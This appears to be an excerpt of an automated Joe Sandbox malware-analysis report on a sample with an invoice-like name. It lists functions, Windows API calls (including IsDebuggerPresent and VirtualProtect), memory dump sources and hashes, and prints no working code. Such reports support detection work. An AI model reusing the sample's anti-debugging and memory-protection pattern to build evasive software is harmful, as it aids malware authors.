Instruction ID: b97fcaed2544103b42f9105dec0a08c679ab74b9423e4c18f38fa931a677137e
Opcode Fuzzy Hash: e243572e48be38f5961eb81d560dcf66b3270130f7376f4384b515887a79e528
Instruction Fuzzy Hash: 7501F9719042187EDB18CB99C816FEE7BF8DB15305F00415FF152D2281E578A7048B60

Function 00493A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74E4C8D0.UXTHEME ref: 00493A73

Part of subcall function 004B1405: __lock.LIBCMT ref: 004B140B

Part of subcall function 00493ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00493AF3
Part of subcall function 00493ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00493B08

Part of subcall function 00493D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00493AA3,?), ref: 00493D45
Part of subcall function 00493D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00493AA3,?), ref: 00493D57
Part of subcall function 00493D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00551148,00551130,?,?,?,?,00493AA3,?), ref: 00493DC8
Part of subcall function 00493D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00493AA3,?), ref: 00493E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00493AB3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: 455075a514d02e5475edc8bb5b57d11c20b61e7362135b392c298e670ff11252
Instruction ID: 1dfdd195e62d77508159901fc3634e97d302e4791414a35a9bff24c4b63b2216
Opcode Fuzzy Hash: 455075a514d02e5475edc8bb5b57d11c20b61e7362135b392c298e670ff11252
Instruction Fuzzy Hash: 4C11C0715043409BC300EF2AED59A0EBFE8EBA5325F00891FF484872B1DBB49549DB9A

Function 004BE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 004BEA29
__close_nolock.LIBCMT ref: 004BEA42

Part of subcall function 004B7BDA: __getptd_noexit.LIBCMT ref: 004B7BDA

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 506c10bc79eb3ef411a812e6ee00747d544706980fd6776ec4da21120bc9b538
Instruction ID: ae306926382f094273cbf2b1fbda737cd24962ed18ea68297aa9af09e9f1b0ca
Opcode Fuzzy Hash: 506c10bc79eb3ef411a812e6ee00747d544706980fd6776ec4da21120bc9b538
Instruction Fuzzy Hash: 6111C6724096108ED711BF66C8413D93A656FD633AF26434AE4241F1E2C7BC98019BBD

Function 004B3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B3868
__lock_file.LIBCMT ref: 004B3889

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5fa95a8089dfdb9825c4cb682f59f4abdbe41b0ccd84d437c57606874876d3ea
Instruction ID: a62b8758228d210f42987fdacfb5e6d9e219de46b377057a728018e2fd930610
Opcode Fuzzy Hash: 5fa95a8089dfdb9825c4cb682f59f4abdbe41b0ccd84d437c57606874876d3ea
Instruction Fuzzy Hash: 19012571800209AACF21BFA78C015DF7BA1AF80755F15411FF41456261D7798761DBBA

Function 004B35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

__lock_file.LIBCMT ref: 004B3629

Part of subcall function 004B4E1C: __lock.LIBCMT ref: 004B4E3F

__fclose_nolock.LIBCMT ref: 004B3634

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e1ac41ba1444c215b2bdf35690599be7ceb75c1390d9f000af49515706794ef0
Instruction ID: af60769214fb770ff40127b0d44fe1e08377c4474965c6894a48a82630295ae9
Opcode Fuzzy Hash: e1ac41ba1444c215b2bdf35690599be7ceb75c1390d9f000af49515706794ef0
Instruction Fuzzy Hash: 99F0BB31841604AADB21BF7788027DE7BA06F41339F26810FE410AB2C1C77C9A119F7D

Function 01347BE0 Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 01347450: GetFileAttributesW.KERNELBASE(?), ref: 0134745B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 01347D45

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 0fb07f036fa685caa8c61150f1284e9020a13249e71a45f7c6cd1a95ba69e007
Instruction ID: 6d71c2e83bb91f650688238d59fc7d258fea09deb5a9b8dfc878adbe9c8a320c
Opcode Fuzzy Hash: 0fb07f036fa685caa8c61150f1284e9020a13249e71a45f7c6cd1a95ba69e007
Instruction Fuzzy Hash: 7E518D31A1020997EF14DFA4D844BEF737AEF58700F00456DE60DE7290EB76AA84CBA5

Function 004B2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 004B2A0B

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 599d5014eb1af8619cd47dd96df528ef0ab0dfff3180c8577fc1f31cfc4e119c
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: B041C9707007069FDF288EA9C6905EF77A6AF49350F14852FE459CB240D7F8DD418B68

Function 004AED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 004AEDC7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: dc733911cb3c2171221dbcfc1bdc03b725792a15c478eacaf5702018818ccbbf
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1631FC74A00106DFC718DF1AC480969F7B6FFAA340B6486A6E419CB355DB34EDC1CB95

Function 00509A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00509A80

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 55793b45794f8fa889aa56f99e724254f9fd939a56fec658de9635469a7f7ae6
Instruction ID: 98ae9a4e367a0e7cc41ee8b99792afd006895a9abd05c6b5b2e27031ca920c13
Opcode Fuzzy Hash: 55793b45794f8fa889aa56f99e724254f9fd939a56fec658de9635469a7f7ae6
Instruction Fuzzy Hash: A3416D705086118FDB24CF19C444B1ABBE0BF96318F1989ADE9964B362C37AF846CF56

Function 004BED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: f3fc7dddd7a3abf91cc7766ebea9f47ee10b1b3a2077af9536ea3396221e306a
Instruction ID: 79c2e8d17d5f0e16997b5aefac43b18801169c9b97b93e7c7e84c2f9e6b561fb
Opcode Fuzzy Hash: f3fc7dddd7a3abf91cc7766ebea9f47ee10b1b3a2077af9536ea3396221e306a
Instruction Fuzzy Hash: D12162728086018FD7117F76CC467D93A656FD233AF26464AE4244B1E2DBBC98019BBA

Function 004941A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00494214: FreeLibrary.KERNEL32(00000000,?), ref: 00494247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004939FE,?,00000001), ref: 004941DB

Part of subcall function 00494291: FreeLibrary.KERNEL32(00000000), ref: 004942C4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 8c5ade79aa01310410dd4fd663d4cd7fd7484a3324d1beb1dabec80209446f5a
Instruction ID: c2c75520b7d8d84ec77d9b2f0882d418e07beea9055ad948ff9c1aba2b285faf
Opcode Fuzzy Hash: 8c5ade79aa01310410dd4fd663d4cd7fd7484a3324d1beb1dabec80209446f5a
Instruction Fuzzy Hash: 1111EB31600206AACF10AB71DD06F9E7FE5AF80748F10843EF956A61C1DA789A029B68

Function 00509B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00509B51

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: b3ceda470afcae06bacf30c0be59dea383eb76a3b78a003a25991b44165e4267
Instruction ID: c1d3c5d2ec78026f90c84576bcc064e8a26a6720afbc33b3118fdeb6beb87a31
Opcode Fuzzy Hash: b3ceda470afcae06bacf30c0be59dea383eb76a3b78a003a25991b44165e4267
Instruction Fuzzy Hash: 952166705082018FDB24DF65C444A1ABBE0BF9A304F14496EE59647362C33AF845CF56

Function 004BAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 004BAFC0

Part of subcall function 004B7BDA: __getptd_noexit.LIBCMT ref: 004B7BDA

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: e1aff392ed43884aa54abedf2298abaf2c62430a68452eeb7e56048c276cb91a
Instruction ID: cfad82dc1b8b84b197febf3ade3a6825ac6e72196b43afb4008e5c2b85f7d5a7
Opcode Fuzzy Hash: e1aff392ed43884aa54abedf2298abaf2c62430a68452eeb7e56048c276cb91a
Instruction Fuzzy Hash: 8811C8728086008FD7117FA5C8017EA3A60EF81339F16424AE4341F1E2C7FC9D119BBA

Function 004939DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction ID: 568085004595ad3f446fc11f7c4a362210f3e89dd53b37c4560e574c0db90f29
Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction Fuzzy Hash: 4C01863140010AAECF05EFA5C892CEEBF74AF21344F10806BB515971A5EA349A4ACB64

Function 004B2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004B2AED

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 3565756967d1f0365def4ff59dd9134f48d00702351428db31d3cad47d6dd6bb
Instruction ID: 9482f89b85546f8088029f9f6a31732f4d555df12214fde6dd7fdf5b9f3c4749
Opcode Fuzzy Hash: 3565756967d1f0365def4ff59dd9134f48d00702351428db31d3cad47d6dd6bb
Instruction Fuzzy Hash: 95F0C231500205AADF21BF768D067DF3AA5BF44318F25481BF4149A191C7BCCA22DB79

Function 00494252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004939FE,?,00000001), ref: 00494286

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: af15b1f9b7cc3a646c90c86f983ac601e72edddf664f33f58dfdcc91004d9ab8
Instruction ID: baa64ea212a110fe77a118dfc07d3587128318d4cc836d68c1c5dffcdd661c28
Opcode Fuzzy Hash: af15b1f9b7cc3a646c90c86f983ac601e72edddf664f33f58dfdcc91004d9ab8
Instruction Fuzzy Hash: 62F08570405302DFCF348F60E880C12BBE0BF803A93208ABFF1C682610C33AA841DB54

Function 004940A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004940C6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c3bbc519ae6d6c3215cf6c6b577ced7046043f2a9400db2edc5e2e991f777397
Instruction ID: 9006e33bcac89ec7e04ce8fd8b54f68bfbf1e5edb6020897beeb3e864534e9bf
Opcode Fuzzy Hash: c3bbc519ae6d6c3215cf6c6b577ced7046043f2a9400db2edc5e2e991f777397
Instruction Fuzzy Hash: DDE07D325001241BC711A358CC42FEA77ACDF88694F050075F908D3204DA68998186A0

Function 004DBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004DBD16

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 4fb9a9badf1cd6d72898d3785e1092dab4dc6578faafb3e9538c5a9e328a879c
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 28E092B0204B009BD7348A24D810BE373E1EB09309F00081EF29A83341EB627841865D

Function 01347450 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0134745B

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 842896c8d84e4b6b5e7f957671402eae34aa7163c224f61614c6e8923c69764f
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: D8E08C70A0520CEBDB20CAAC8C04AF97BECD708324F104654E916E33D0D634AA449614

